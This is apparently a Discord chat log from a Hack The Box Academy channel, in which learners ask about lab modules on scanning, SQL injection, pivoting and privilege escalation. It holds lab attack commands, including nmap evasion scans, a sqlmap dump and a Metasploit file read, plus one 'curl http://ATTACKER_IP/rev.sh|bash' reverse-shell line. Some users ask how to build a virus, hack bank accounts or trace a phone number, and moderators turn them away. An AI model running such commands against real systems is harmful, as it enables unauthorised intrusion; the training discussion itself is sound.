#modules

thanks

<ip> ns.inlanefreight.htb in /etc/hosts and ns.inlanefreight.htb in your resolvers.txt

okay

You can run curl -H 'Host: subdomain.domain.htb' domain.htb to test if there's A/AAAA records, for example.

Does the HTB cert have any real acceptance, or is more for personal gain?

You can directly write the ip into resolver.txt

Will this work? Yes. But you can just add the IP address which doesn't involve any guessing for subs like ns

Both

Ah, that makes sense. I just had it mapped in my hosts so I put the name.

If you add a name as a resolver, another resolver needs to resolve it to an IP address

Who watches the watchman, right?

@acoustic owl I'll leave it to you to reply Dom :). Also, @lapis lion you should use #cpts

Sorry I am new to this discord, still figuring out which chats go where, ty !

Thanks for the tip 😄

just copy-paste your question there

will do!

can we not post screenshots here?

Read and follow #welcome

permission to DM someone?

Sure

For example, check this page
https://boards.greenhouse.io/synacksrt/jobs/150860

ahhh so it is a pathway.. nice!!

Thank you for the link @acoustic owl I appreciate it !

@clear hatch You must not mention so many people at once. The police bot does not like that 😉

The name server exists on your host. The /etc/hosts file is what it users to resolve domain names

are there any specific certain for internal network penetration? nothing to do with web

That is not quite correct
https://securityzines.com/assets/img/flyers/downloads/howDnsWorks.png

There host file overrides other name server is what I’m getting at

I believe could be wrong 🙂

Yes, the hosts file is requested first.

are there any specific certain for internal network penetration? nothing to do with web

You need a permit. Before that, it must be clear what you are allowed to do and what not.

bruh

just need a certification

https://academy.hackthebox.com/preview/certifications/htb-certified-penetration-testing-specialist

bruh, I can only log into the academy part of htb for some reason

This is normal.
For the main platform you need another login

thats....

ok then...

🤨

Hey! i'm on shells & payloads module, on final assessment.
I understood what the exercise is asking to do, but in order to do it it is not required to access a web browser? Because i can't find one in the foothold machine. Am i being dumb or we have to do the assessment without accessing a web browser?

open a terminal and type firefox.

This should help

Alright thanks i was cURLing all the way 😂

Im on password attacks on the Credentail hunting in linux https://academy.hackthebox.com/module/147/section/1320

And I have ssh onto the machine as sam from the prevous modules

I found the backup files and kiras ssh files but neither of them i can actually do anything with

What am I missing?

Someone who use ligolo-ng?

for double-pivoting the 0.0.0.0 should be my ip? or it is 0.0.0.0

figured it out nvm

I just do 0.0.0.0 for both and its smart enough to work

k ty

The 0.0.0.0 makes it listen on all interfaces

hi hys im doing Web Attacks Mass IDOR enumeration and i cant find any files under /documents for any employee at all its empty i did the first 2k employeess in case it was a trick and they where scattered but nothing

nvm burp was bloking stuff

It's a bit weird because you're doing it over a VPN on HTB's network, normally you could just do nslookup IP and it would work

https://0xdf.gitlab.io/2020/04/14/htb-cronos.html#dns---tcpudp-50

Here's a good example of using nslookup and specifying the server

Module: Network Enumeration with Nmap
Chapter: Firewall and IDS/IPS Evasion - Hard Lab
Description: I need some guidance on how I'm supposed to be enumerating the services. ||First I ran a simple -sT scan with default settings and I received ports 22 (ssh) and 80 (http) open. I then ran another scan across all ports and got the same result. After that I ran a -sU scan with options -Pn and -n, which found net-bios running on port 137. I enumerated all of the ports I found (22, 80, and 137) with --script vuln,discovery,auth,version, with nothing conclusive found. On port 80 the directories found returned 403 forbidden. I'm at a bit of a loss, I think the only real options I could have missed is the speed of the scan and wait time values. I ran most of the above scans with --packet-trace and couldn't find much.|| Am I overlooking something, or is there a different approach to take?

Still confused about your syntax remark. I see what control enterprise admins has over the domain object but I can't get it to accept any of my answers. 😦

Skills Assessment - SQL Injection Fundamentals
used ffuz to find the following urls http://83.136.252.24:41068/dashboard http://83.136.252.24:41068/dashboard/index.php

i have already tried to inject via HTTP POST (login credentials) but no success so far. does anyone have a guideline or recommendations what to look out for?

For this one I had to run it from the pwnbox and ||use source port 53||

Ahhh see I used ||nc and made connections when using the source port as 53|| but I didn't think much of it. Thank you very much, I have something else to play with now

Sure thing, let me know if you need anything else

Its case sensitive.

First 3 letters are capitals, remaining are lower case.

I'm still having a hard time, I'm running variations of
||sudo nmap --script version -sU -p 22,80,137 -g 53 10.129.226.151 --max-retries=0 -Pn -n --disable-arp-ping --stats-every=10s --packet-trace||
It looks like I'm getting the same results, so I may just not have a very keen eye for what it wants me to find.|| I can only get the version of the web server and ssh.||

Try ||sudo nmap -sS 10.129.2.47 -p- -g 53||, it was really inconsistent for me, I remember this exercise being kinda wack

nslookup domain ip

Read the section under the proxy part for ids/ips evasion detection

That will clue you into the type of scan it wants

Immediately helpful. For a moment I was confused about the proxy part because I didn't have any addresses to use, but I understand where my flaw was.|| I used -sU thinking about UDP 53 where I just needed to use TCP. I found what I need to enumerate now. Thanks guys @quiet ember :D||

Yep in-fact if you slightly modify the direct port scan from the example to be all ports, it'll pop up as well :)

I've done quite a bit of command tinkering on this

Sounds like it, now I wonder if that technique will work through all of the modules. This was a very fun expirience

You mean slight modifications to commands?

Yeah to the example commands

Always. Break the command down to the bare minimum

It's because there's a specific domain it wants you to enumerate

This has nothing to do with academy, see #rules and #welcome on how to view other parts of the server

Ahh I'm back to square one again, I have the port and the service but now I'm having an issue grabbing the banner. I keep getting a "no route" error with netcat and all my nmap attempts come back as filtered. There has to be something I'm not understanding, I've been on this hard lab for a day now

||IPSs will limit the traffic rate and block it if it becomes too much, maybe it's a speed issue? The IP address isn't blocked, I can still run my scans and get a result, so I think it's just a regular firewall. Is it possible to configure NC to ignore ICMP responses like destination unreachable?||

I'm not at home to check my notes but remember you're looking for the source of your port issues

I didn't do anything different, I restarted the machine and was able to get the flag with the same methods I used prior. I'm not sure what went wrong there, but I'm glad I got it. Thank you for the tips Marcie, I think that ends our discussion tonight!

Ah the good Ole reset technique

It happens

Anyone do SQLmap essential skill assessments?

Plenty of people have

Just ask your question regarding what you're stuck on and what you've tried?

Yes wait

sqlmap -u 'http://83.136.251.221:47198/action.php' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: /' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/json' -H 'Origin: http://83.136.251.221:47198' -H 'Connection: keep-alive' -H 'Referer: http://83.136.251.221:47198/shop.html' --data-raw '{"id":1}' --dump -T final_flag -D MySql -temper=between

What I did wrong here?

event I follow still error.

Lab issue?

Is that... a spoiler channel, showing academy content?

I don't know

so you're telling me you saw the answer 🤔

I saw but I not copy it.

You just pasted spoilers here lol

I trying what I did wrong with my own idea

I dunno how HTB hasn't taken that down already

ok removed

oh I use wrong command

--temper > --tamper

wait like a YouTube vid?

guys i'm having trouble connecting to hackthebox's vpn

Download the VPN file again

there's some channels on yt that spoil paid academy content.

yeah I know, just clarifying thats what someone posted here lol

Hi there, anyone could help me with BloodHound Skill Assessment final question about percentage of users with a path to GLOBAL ADMINISTRATOR. I think had identified the AZUsers , but all my answers were wrong. thanks an advance

Here is a cheat sheet.
There you will find the query and only need to convert it to Azure
https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/

What is the answer to this question in the Bug Bounty Hunting Process module?? It's talking about the CWE & CVSS score. Is it not Attack Vector? I tried so many different combinations of writing it but it just doesn't work

they require more specific

I'm assuming it's Adjacent then? it doesn't work either, hmm

time to try like 100 different ways of writing the same thing

make sure u dont have any trailing spaces

nvm I got it, it's just "Adjacent" all by itself. I guess I'm just being stupid. Thank you for the help @umbral wigeon

Hello, in the Footprinting Module(DNS Section), there is a line ". However, other DNS servers may be configured differently and, in addition, may be permanent for other zones." . what does DNS may be permanent for other zones mean, i didnt understand that part

This seems like a translate issue

Are you translating the page?

no

Ah I misread it I thought you only shared the sentence fragment

the last line of the paragraph. i dont understand it

It just means that there can be multiple dns servers for multiple zones

how do you define a zone?

Google it

k

Hi,there , I have a concept question about the ssh tunneling.
There is a 10.129.15.50/172.16.5.129 host which open the 3306 port.
And my host IP is 10.129.15.51.
I want to forward of local port 1234 to 3306.
Then, this is correct command
ssh -L 1234:localhost:3306 ubuntu@10.129.15.50
But why can't I use the below command?
ssh -L 1234:10.129.15.50:3306 ubuntu@10.129.15.50

Because we can use
ssh -L 1234:172.16.5.130:3389 ubuntu@10.129.15.50
which 172.16.5.130 is another host in the 172.16.5.0/24 subnet.

Hi I have password attack hard lab question
I had samdump2 the dump file from encrypted VHD and got Administrator Hash.. but not be able to Pass the hash login anywhere.. am I missing anything

hello

can some one help me

how do i get wlan my internet ip in kali

NAT? you probally behind one

yes my kali is in NAT

so how to change it

yeah isee it

my kali is set on NAT

i wanna change it ??

@rustic sage if you are new here read #welcome and #rules after that use /verify at #bot-commands and this channel is for hackthebox academy after you verify take it some thing like #hacker-lounge

but the answer for your question is a google search away so do that first

i am verifying

if your hash doesn't start with ||e5|| and end with ||a1|| then you probably got the wrong hash and try with something like secretsdump

i cannot find my hash where it was

please keep this channel on topic. thank you 🙂

yes i will look again... thats' mean the information from .vhd is unusable

If anybody wants to develop a note taking methodology using obsidian I have some great resources that has helped me make very good notes

you dont gieve me the answer

I don't get it why you want your internet ip if the router don't forward whatever your ip behind nat is useless

i am making a file which access any pc for some study purpose and installed it on my another laptop which has wifi in it but dosent work in

because i set my ethernet ip on that virus file

so i think that i wanna put my wlan ip so it will connect then

but i cant find it on when i text ip addr or ifconfig in terminal it doesnt show

your not with the topic of the room

sure my note suck ass and i want to at least re-do some of it before doing some exams, can i dm?

#modules message

Mr.hacker before you try to virus or do big thing.. go back study more on networking and such

yeah you are right

it don't work that way like you think

i just wanna study about networking

try youtube fundamental is everything

more hint?

for the password attack hard lab?

shoot me a dm with what you got

@vital adder yes

my head hurt now hahaha

a tips for that is red bull

anybody done the JavaScript Deobfuscation module? my answers arent right i think, but im wonderin gwhere im messing up\

Can anyone help me with the question "How many total packages are installed on the target system?" on Linux Fundamentals - File Descriptors and Redirections?
I searched and it seems the answer is something like "dpkg -l | grep 'ii' | wc -l" but I don't see the lesson mention dpkg anywhere

look in the "cheats" section, dpkg is in there

i dont think there's much in the lesson on it (i dont remember tbh)

I saw the cheat sheet but I assumed there would be a way to get the answer without using dpkg so I wasn't sure if I should open it
At first I tried something like:
find / -type f -name *.dpkg 2>/dev/null | wc -l

Thanks @wraith sable

what's the issue?

the answers im getting to the decoding and skills assessment questions; for decoding im getting the 'secret message' from the hash but neither the secret message or the other key im getting work for the answer

mind if i send a screenshot? it'd explain better lol

sure shoot me dm

Hiya lovely peeps 😄
I've encountered a bit of an issue and I can't seem to figure out if I'm doing something wrong or if LOLBAS is out of date.
I'm currently going through the "Living off the Land" section of the file transfer module, and it mentions using "certreq" to make post requests to a netcat listener. LOLBAS also mentions the use of this "-Post" parameter for certreq.

However, when I'm attempting it on the windows VM provided in the optional exercises section, I'm getting a " The parameter is incorrect. 0x80070057 (WIN32: 87 ERROR_INVALID_PARAMETER)" error message. My googling hasn't been able to find me the solution, so I was wondering if you guys would know 🙂

What does your full command look like?

CertReq -Post -config http://<myip>/ C:\Users\htb-student\Desktop\upload_win.txt

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certreq_1

Yeah, unless -post is a hidden flag, I can't find any documentation that mentions it.

If it did exist, it's likely it doesn't anymore.

k thanks. Glad to know I'm not going crazy 😛
I'll put in an erratum for it.

Looking through the channel history, this seems to have come up before a couple times, with the same answer.

Yeah, should've checked before posting. My bad.
I've put in an erratum and opened an issue on the lolbas project as well.

Has anyone done DACL Attacks 1: AddMembers ( https://academy.hackthebox.com/module/219/section/2332 ) and can share some insight? I'm working through Q1, and I've made pedro a member of the TestGroup, and I can see Read Write access to the share via CME, but it still says Access Denied.

hi guys quick question if someon can help please and thank you. in the screnshot there is a scriot i took scrypt and ran it after i changed target port and ip. but i cant re create the result im getting a file called download.php that contains text 'contract is not defined'. i thought in course material we should be able to at least recreate what they show us. NVM they show a harder way in the text but in reality its way easyer..

trying to add 50064.rb exploit to metasploit on remote machine to in shells and payloads module but when I run "updatedb" or " sudo updatedb" it doesn't work

@wild dragon Can you help him?

@pine dagger text me, I'll help you!

INFORMATION GATHERING - WEB EDITION - whois - What is the admin email contact for the tesla.com domain (also in-scope for the Tesla bug bounty program)?

Whois results gave me: email@markmonitor.com and email@dnstinations.com
Bountypage on bugcrowd gave me vulnerabilityreporting@tesla.com

None was right, other places to look?

Hi,

In Dacl Attacks Skills Assessment, I'm stuck on the 4th question, What's Jose's NTLM hash? I checked BloodHound, I didn't find anything.... I am confused any hint?

run it again and read the output again

Can i show my answer on someone who passed linux privilege escalation to see if my answer is correct I'm on section linux services and internals enumeration i type the answer but shows me The wrong answer

Will do! Just out grabbing ice cream 😉

There probably is but as it's a fundamental course: they're only teaching the basic way

?

Short answer no. You said you're typing the answer, why not copy/paste the answer

I try anything

So far it has given me a few boxes right answers wrong

if you need help with that DM me for help

Refresh page and try again. Also read the question carefully to make sure you're answering the question properly

Refresh it several times

try harder.

That's why i just ask to type someone what i type as answer to tell if I'm wrong or the box is buggy

What is the question asking?

What is the latest python version that is installed on the target

Slava Ukraini.. but this is not a hint 😉 If you don't have real answer please don't answer because i'm focusing on the lab

thanks

And you're sure you're on the target system when you're running the command to see which version is installed?

Absolutely

damn your htb profile is a real deal.

What command are you running?

Whereis python, then type /usr/bin/python3.11 --version

Why not do which python

anyone help please

you have to find out the LAP password --> using it to remote to WS01 --> mimikatz to retrieve the ntlm hash of users!

Have you tried to just use it?

text me if you want my hand

Because doesn't shows me anything

¯_(ツ)_/¯

Usually python though has subversions

And what is the differences

3.11.x.x

3.11 is just the major version release

Yes i typed it with subversions

Not just 3.11

Are you typing 'python {version}' or just '{version}'

I tried both

Both doesn't work

Thank you! Oh, yesterday definitely I was sleepy because i didn't see it thank you again.... I will check it and then if it didn't work i'll ask you in private 🙂

Weird

I haven't done this one

yes, just text me, feel free, bro

😟

And currently not able to check it or run it

If you utilize the discord search feature though you can see if someone else has asked the same question. Just don't forget to do in:modules in the search query

done mate 😉 thank you again

it was really easy but maybe I had a overthinking 😄

Ok

It was without the subversion

:)

But yeah, in future, search first and see if it was answered

Saves a lot of time

Ok, thanks for your time

thank you prob I finished it 🙂

https://academy.hackthebox.com/achievement/75267/219

It's really recommended module

How is it listening to the same port?

the attack host is listening on 4443 which means the target host has to connect to it using the same port

damn, i was reading it like
statment
command

statment
command

thought it had socat listening on 4443 and nc aswell

thanks

np you can use netcat as both a listener and connector

hey, rereading im getting to the same place...
in the example, attacker is starting a socat listener on 4443
executes an unknown socat one liner (i assume to 4443) on target
and it is getting revshell on netcat listening in the same port

Hello, Im currently in the last section (859) of the module 77 (getting started). the task is: "Spawn the target, gain a foothold and submit the contents of the user.txt flag. " The webapp is running a vulnerable version of GetSimpleCMS. I also did enumeration to get hidden pages and found the admin login panel. however i have no idea where i can find the password, but i found an API Key which can be used (https://www.exploit-db.com/exploits/46880 - "however authentication can be bypassed by leaking the cms API key to target the session manager"). But how can i target the session manager now?😅

what module os this?

Attacking Enterprise Networks

yep

it's a very roundabout method to stablilize a shell imo, but I've definitely done worse

im not understaing the example tho

• <VULNERABILITY> lets you run a socat reverse shell on the target, which the attacker recieves with netcat, listening on 8443
• Then, to stabilize, the attacker starts a new socat listener on 4443, and uses the reverse shell on 8443 to submit a new socat command to connect to the 4443 listener

which comand is redirecting the shell?

have not used socat in my life

There's no redirecting, it's literally just getting a reverse shell, and then using the reverse shell to get a better reverse shell

oh my god

im idiot

no, this example is just really confusing

I assume they do this to get around constraints by exploiting <VULNERABILITY>, but this is still kind of convoluted

command injection was with filters so yeah, easier

well man, thanks for taking your time 🙂

your ahead of me lol I was beyond confused when i looked at it for a second time

does someone have an idea? i dont really want to bruteforce the hashed password now...

The weirdest thing about it is that having to run the reverse shell twice kind of defeats the purpose of using socat imo. I haven't done the module, so I don't know if there's anything weird with that box, but I feel like an nc mkfifo or even a curl http://ATTACKER_IP/rev.sh|bash would have worked

iw as literally going to try that

give me 10m and i'll help u out

I would help but I genuinely don't remember what that box was and I didn't take notes

thanks man, i appreciate it

or nevermind

@sly reef

pass was "admin"

xD

who can help me decode a secret code please?

crypto?

no just a secret code

like secretcode=....................................................

dude we need context

i want decrypt the secret code i don't know how to do that

in a web stuffs

where is this code being used, which is the code

did you see @sly reef ?

can i dm you please?

yeah

This has nothing to do with htb academy please keep things related to that

Hi @fathom pendant . Pertaining to "Connect to the target machine using SSH to the port TCP/2222 and the provided credentials. Read the flag in David's home directory" from the "Pass the Ticket (PtT) from Linux" in the Password Attack module. It appears the credentials do not work. I ran ssh command in verbose mode there was a successful server connection. Additionally, I verified this with traceroute the htb vpn connection 10.10.14.50, connected to 10.10.14.1 then to the target ip address. I copied and pasted the credentials and double checked and they were correct.Yet when I entered them I keep getting the error, "Permission denied (publickey,password)". No idea what I am doing wrong...

I currently do not have internet access to verify this. I dont recall having issues

Solved it:
"Scenario

To practice and understand how we can abuse Kerberos from a Linux system, we have a computer (LINUX01) connected to the Domain Controller. This machine is only reachable through MS01. To access this machine over SSH, we can connect to MS01 via RDP and, from there, connect to the Linux machine using SSH from the Windows command line. Another option is to use a port forward. If you don't know how to do it, you can read the module Pivoting, Tunneling, and Port Forwarding."

Basically, had to use credentials from the previous section and then ssh from that machine....

Hello All, just reminder as it just happened to me.
IG you are stuck in Information Gathering - Web Edition module, at Information Gathering - Web - Skills Assessment section last question which is "Perform subdomain enumeration against the target githubapp.com. Which subdomain has the word 'triage' in the name?"
And you have been using sublist3r then you properly won't find that right subdomain as I assume that the requird subdomain have been removed and I haven't got any luck with sublist3r. What I can recommend is using https://subdomainfinder.c99.nl/ as suggested by @vital adder.

Can anyone help me with Linux Priv module SUDO section?

Hey guys

Run sudo :^)

Who here

LOL first time the given pw works for sudo....

wow

Loll

Where u from

#welcome and #rules , you should probably read them

Though your username suggests you have no idea what any of this is

👍

Okay

This channel is for discussion of the learning modules found on https://academy.hackthebox.com not for casual chit chat

hi, im having some issues with the skills assessment for shells and payloads module, i have managed to upload some payloads to host 1 (both manually + with msfconsole) and they are being uploaded and showing in the dashboard as running but when i try to navigate to the url to activate them im just getting 404s

Are you sure you're navigating to the right url. You might be one or two directories too deep. I struggled with this too

im clicking the link from the manager page

🤣🤣

Hi guys I have a question I don't know if I am right I should find an exploit and capture the flag for this question but I don't know if I am right.

Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start) --Module gettinStarted

This is the exploit I found but I don't know if I'm right.

Exploit: MyServer 0.4.3 - Denial of Service
URL: https://www.exploit-db.com/exploits/94
Path: /usr/share/exploitdb/exploits/multiple/dos/94.c
Codes: OSVDB-2808
Verified: True
File Type: C source, ASCII text

Can someone verify if this is correct so I can continue because I have not found the question.

i dont think you want a denial of service

Perform the search in the following way
searchsploit 94.237.54.69 -p 31249

hello i got a question but can someone help me in private to avoid making a spoiler of the SQL module ? it's about the email of otto lang

Wrong

with searchsploit you need to search based on vendor/package not an IP address

So it is not that way to perform the search.

First: because it's a DOS exploit. So definitely not correct.
Second: just identify the services by running an Nmap scan first and seeing if there's other ways to interact

If I'm recalling correctly, you only need a small amount of enumeration to know what to use

I ran it through nmap but did not know how to approach to start the capture.

Capture of what?

Well it seems like a public exploit. Perhaps visiting the website will be useful

the answer

This is what I found with nmap because I had already done a scan but didn't know how to approach it

19/tcp filtered chargen
22/tcp open ssh
139/tcp filtered netbios-ssn
55600/tcp open unknown

Start simple - visit the target

If I'm remembering it is a web page ( http://ip:port

If it is wordpress

my note taking wasnt great for that module but i think there is a decent chance the exploit you need is one of the ones discussed in the module

Think slightly more narrow, there may be a plug-in that's vulnerable

Look up how to do an nmap scan in the modules again to get more info

Searching for exploit pos ssh will be the answer

I mean I did a scan with the port in conjunction with other ports and I don't know how to search for the exploit.

The target spawns with a port that is given

It is not required to scan the whole target's ports

^

Whenever a target gives you a port it is reasonable to assume they want you to focus on that

I'm a bit lost with the question

I focus only on the specified port?

Yes.

wow

in general though when your looking for exploits you want file upload/download or remote code execution, not denial of service

the goal is to extract data from the target machine, not just crash it

34164/tcp closed unknown

open it in a web browser

Hello, any hint for Password Attack module? 😥

^

Use the provided lists

Or rockyou

Do not try to dos their server running the docker container

So long, 90k the machine finished before to finish hydra

I mutate 4 list AND none

Don't brute ssh

Ftp, smb :/ none

You're not really providing much info for me to actually be helpful

What section are you working on

What I also want is to find it by my own means and not be given the answer easily.

gettin started

module public exploits

there are multiple conversions going on here :p

Visit the webpage

Literally that's 90% of the work

@fathom pendant I have been doing Hackthebox for the past 6 months and now I am in hacker rank so next shall I subscribe to the VIP or shall I go with the academy premium?

Whatever works best for you brother academy and main platform are separate

i just worked out what i was doing wrong 😦 the exploit wasnt in the web root of the app, i had to include the jsp file in the url :p

@fathom pendant Yes so which shall I purchase

Can you suggest which is best for learning

your asking the question in an academy channel :p

Academy is best if you want to learn in a slightly structured way. VIP on main gives access to retired machines that have writeups which you can also learn from

Ok bro I am a student so what steps I should do to claim the voucher

You mean Academy subscription discount?

I think I found the exploit Simple Backup Plugin 2.7.10

Yes for discount for students

If you didn't sign up using your academic email, message support

Ok

Thank you bro

Can neither confirm nor deny. But why don't you use searchsploit or msfconsole to see what you find

That's what I'm going to do I'm going to search rapid7 and continue the adventure

Hey

I would like to study

Then do it

¯_(ツ)_/¯

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Thanks 🙏

I have found this for the moment and I think I have to look for the answer. @fathom pendant

/home/kali/.msf4/loot/20230715213516_default_94.237.62.173_simplebackup.tra_907693.txt

I can't see it lol its on your local machine

But that probably is correct

No

Why

what is orange account

Read #rules

Don't poke, as the conversation is going to lead very off-topic

Why

Your sorry

Because it is not legal nor relevant to this channel

how do you flag a serious rule break again?

@urban sage

This guy DM'd me after being told no here and is asking me how to hack bank accounts.

Please ban this guy

@sterile hawk

https://tenor.com/view/i-have-been-summoned-gif-19881033

xD

ajjajajajjajaj

@fathom pendant I have found the vulnerability but I can't find the flag.txt

exploit Simple Backup Plugin 2.7.10

Read the options for the msfconsole exploit and see what can be changed

msf6 > use auxiliary/scanner/http/wp_simple_backup_file_read
msf6 auxiliary(scanner/http/wp_simple_backup_file_read) > show options

set RHOSTS 94.237.54.69
RHOSTS => 94.237.54.69

set RPORT 31249
RPORT => 31249

what other options are there?

run

20230715213516_default_94.237.62.173_simplebackup.tra_907693.txt

root: 0:0:root:/root:/bin/bash
daemon: 1:1:daemon:/usr/sbin:/usr/sbin/nologin

I found something like this but not flag.txt

that looks like /etc/passwd, what options does the exploit have for you to configure it?

Lol was he banned?

In the source code of the page appears the plugin used and with the search in rapid7 I have found how to use it but when I scanned it I get a completely different file than the one I need.

Yes.

i will review advances options

this is explit use auxiliary/scanner/http/wp_simple_backup_file_read

what options does it have?

ATTACKING ENTERPRISE NETWORKS | Active Directory Compromise

I need to obtain SID from Server Admins but the command is not outputting anything... $group = Convert-NameToSid "Server Admins"

any ideas?

The $group is you saving it as a variable

Do Write-Host $group

Muah

no value

restarted the lab

working now

weird

Linux Privilege Escalation - Sudo Module
Can't figure out how can I read flag.txt or elevate my privilege?

sudo -l + GTFO bins

i guess

use sudo

I have run 'sudo -l' but still have a problem with elevating privilege using ncdu.

Look at the options for ncdu

Still stuck? You can dm me.

thanks @thorn urchin , i spent hours enumerating, got many hashes, passwords, usernames, compormised machines, priv esc,Rubeus, tickets, mimikatz.........

untill your hint got me do it in few mins _(ツ)_/¯

someone need help with anything?

@zinc marsh Hey, I just posted in community-help. Not exactly a module question issue, just struggling a little with my VM configuration. i don't know what's wrong with activate-global-python-argcomplete

my head lore is that it turns out the other pentester didnt just have to leave for some reason, he was incompetent and thats why you had to step in.

can someone please help me with MSSQL question ?

i cant paste what i tried here

it's involving the enumeration part from Footprint module

aiudaaa

xdd

Damn it !

XD

<@&861185840277487616>

Module name: Attacking Common Application
Section name: Attacking Thick Client

Anyone have encountered this issue? When I tried to deselect the Delete subfolders and files and Delete
I got the following error when I re-run the Restart-OracleService.exe

The type initializer for 'System.Management.Automation.Runspaces.InitialSessionState' threw an exception.
'c:\programdata\restart-service.exe' is not recognized as an internal or external command,
operable program or batch file.
Could Not Find c:\programdata\restart-service.exe

I have no idea if I did it wrong or if I'm missing something.

Dealt with

Thanks

How often do you mods receive a thank you?

I'm sure it's a ratio of 10:1 of "fuck you":"thank you"

can you please help me with this

.

:C

Whats the actual question

can i send you a private message

?

Also if you verify through the instructions in #welcome you can paste screenshots

I'm at work and about to be off break

yes but i can not paste the output

i will be quick i swear

:CCCCc

Brother verifying will also help with that

TT-TT

there's something wrong with my python web how do i fix it? i cant code anything there

xd

is there anyone who can trace the location of someone via mobile number because someone has cheated me please?

.htb is intended

No, read #rules

if it was ur mobile yes, unless no. dm

Check dm

Means?

this channel is not for that, it is for doubts.

did you add that domain name to your hosts file?

ah, I didn't see that before

but what is the doubt

Can you trace him?

Suspect

I don't have notes on this section, I have some rusty commands left from that section

I can share a little hint but you gotta figure out the rest if you want to...

htb is not a TLD

.com works because I'm pretty sure they own an inlanefreight.com domain for the corporate osint module

I think I did that with the htb after using the .com by anyway

but I haven't notes

but I think subbrute only worked with TLD and I don't remember if you could add .htb manually

Because .com is an actual registered domain

But it's not going to give you the answers you're seeking @rustic sage in fact I gave you the format for the answer

hello any advise on how to fix this metasploit error please?
im on tail end of windows priv esc part 2 but shells are being weird, timing out/ no response ?
iv ran msfdb reinit

this feeling

after all day trying the overflow

Great success

No idea I don't use metasploit

well I use it for the eternalblue and that's all

what is the flag format for Documentation & Reporting in regards to the steve needing to split screens? I've tried every combo based on pressing ctrl-b and release the keys and then pressing the % key, so I thought the flag would be [Ctrl] + [B] + [%] and it is incorrect

what is mean +2 in the lower table

network and broadcast address

ok thanks

that table is pretty bad tbh

The IPs columns refers to the number of addresses per subnet, and not the actual number of IPs,

And teaching classful networking in this day and age is... bad

can you send the table which using nowadays?

https://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing

+is network adress is the same of ADSL adress?

No. https://networkengineering.stackexchange.com/questions/11200/what-is-the-purpose-of-network-address

there are 4 keys in the answer

it's also explicitly given in the text

https://academy.hackthebox.com/achievement/710422/67
🎉 🎉 🎉

ok thanks

BTW that's not even needed

You can just do nslookup domain ip

htb is already a top-level domain, but it is not an official TLD and therefore it cannot be resolved by the root servers.

guys i do not understand this
according to my understand subnet when octet has number it is refer to network adreess and host adrress must bigger than this number

is not this number which i make aound it red circle bigger than 192?

?

A subnet mask of /26 is 11111111.11111111.11111111.1100000, You take the bitwise AND of that mask with the ip address in binary. Of importance here is the last octet, so a bitwise and would AND 11000000 with 10100000, which results in 10000000. That corresponds to 128, so the network has addresses from .128 to .191 (/26 corresponds to 256/2^2=64 addresses, and there are 64 addresses from .128 to .191 (inclusive)

I'm not really sure what you're asking by "bigger than 192"

Often you'll see 192.168.12.128/26 to refer to the subnet, but you might also see 192.168.12.160/26 to refer to the host and the subnet

This is because htb cannot be resolved from the root nameserver. You could have just used the IP address instead. dig www.inlanefreight.htb @10.10.10.10
Then you don't need an entry in the hosts file either

I also think he's misunderstanding what I'm meaning by domain in the context

Domain is inlanefreight.htb and ip is spawned ip

i do not what is bitwise AND ?

0 and 0 makes 0, 1 and 0 or 0 and 1 makes 0. 1 and 1 makes 1.

ok thanks

hi

Doing Attacking Common Applications: Exploiting Web Vulnerabilities in Thick-Client Applications { https://academy.hackthebox.com/module/113/section/2164 } and after updating and running the fatty-client.jar I get these errors, and i have followed the steps as indicated, help if you can please !

subnetting is very confusing, i advise looking up external resources to help explain things to you, more specifically youtube videos.

ok thanks

Just look up VLSMs.

Don't waste your time with videos.

People find subnetting difficult because they're bad at math. That's pretty much it.

i mean tbh you can just use a calculator

yeah lol

You'll only need to do it manually on the ccna

why i do not only use CIDR table?

My main point was that the HTB module on subnetting was quite confusing. (at least for me).

External articles and resources explained it better for me.

I should go and check out the other tier 0 modules. So far they have all been poor.

Well, you can do that.

It's pretty easy when you know 256->128->64...

They serve as a good starting point but honestly external resources helped more.

I havnt even finished tier 0.

I still think learning process was the worst. I've already ranted too much about that though.

Some of the stuff would be hard to teach without actual objectives tbh.

If you're not illiterate in tech, then I should be able to tell you what a conf file is, but beyond that there isn't much to say about them if you aren't going out of your way to actually configure them

https://news.ycombinator.com/item?id=36466182 stuff like this exists, and it doesn't really make much sense unless you have actually configured something before.

Without that, all the modules basically become fun talking points where they go "this exists, but I won't really elaborate on it in a meaningful way"

Of course, knowing something exists is pretty important.

I went through learning process the other day 💀, it was such a bunch of nonsense, if I hadn't heard a ton of good things about Academy in general, I would have run away from it

Yeah. Maybe the tier i-iv modules are good, but the tier 0 modules aren't selling me on it

It's funny when selling you on it is exactly what they're supposed to do

That module basically amounts to "Can you do it? Yes you can!" ...cue Bob the Builder music.

You don't even know the pricing structure until after you sign up for academy. I don't know what they're doing. It's as if they don't want my money.

The pricing structure is unnecessarily convoluted

Purchasing the tier i and tier ii modules by themselves is cheaper than silver. I don't know how to express how funny that is.

Yeah, silver seems fairly pointless, I guess the selling point is the 1-on-1 coaching for the annual? There's Google and Discord, that's enough

any mods in here?

I need help linking my HTB with my discord

Was mostly a bunch of philosophical/motivation speech type of thing

Currently doing the CPTS path, stuck at pivoting. The SocksOverRDP dll is always getting blocked by the spawned windows system, since it detects it as a virus. Cannot load the plugin with regsvr32.exe SocksOverRDP-Plugin.dll. I confirmed that the firwalls are off, no clue how to continue.

Any suggestions?

too bad a lot of it was incorrect nonsense

You don't get a nobel prize in physics by being bad at math, unless you're comparing them to professional mathematicians.

Disable Real Time Protection

Yup, just wanted to update, noticed it was turned on. Mb.
Thanks.

how the multicast have physical address?

I saw the post debunking everything was Kind hilarious

Has anybody else had issues installing tplmap.py in the Server-Side Attacks module, section SSTI Exploitation Example 1?

nevermind, I got it to work 😄

?

I feel like the only thing worth it on the entire academy is the student subscription.

https://academy.hackthebox.com/achievement/16794/143

yay

Great feat!

shoot me a dm if you still need help

can any mods help me here??

this is the only channel i have access to

any mods here?

Please read #welcome and ensure you’ve read the #rules

